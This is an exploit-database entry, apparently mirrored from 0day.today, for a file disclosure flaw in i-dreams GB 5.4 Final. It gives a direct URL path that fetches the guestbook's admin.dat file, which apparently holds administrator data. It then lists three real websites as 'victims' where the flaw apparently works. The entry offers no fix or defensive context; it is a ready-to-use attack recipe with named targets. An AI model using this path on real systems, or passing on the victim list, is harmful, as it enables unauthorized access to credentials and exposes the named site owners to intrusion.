id: 4871
date: 02/20/2009
title: i-dreams GB 5.4 Final (admin.dat) File Disclosure Vulnerability
author: Pouya_Server
cves: 

===============================================================
i-dreams GB 5.4 Final (admin.dat) File Disclosure Vulnerability
===============================================================


#########################################################
---------------------------------------------------------
Portal Name: i-dreams.net GB
Version : 5.4 Final
Author : Pouya_Server 
---------------------------------------------------------
#########################################################
[Xpl]:
http://site.com/firebook/data/admdat/admin.dat
------------------------------------------
Victem :
http://www.elsapo77.com
http://www.astro-partner.eu/cgi-bin
http://www.zarembowicz.de/cgi-bin
---------------------------------------------------------
#########################################################



#  0day.today [2023-03-25]  #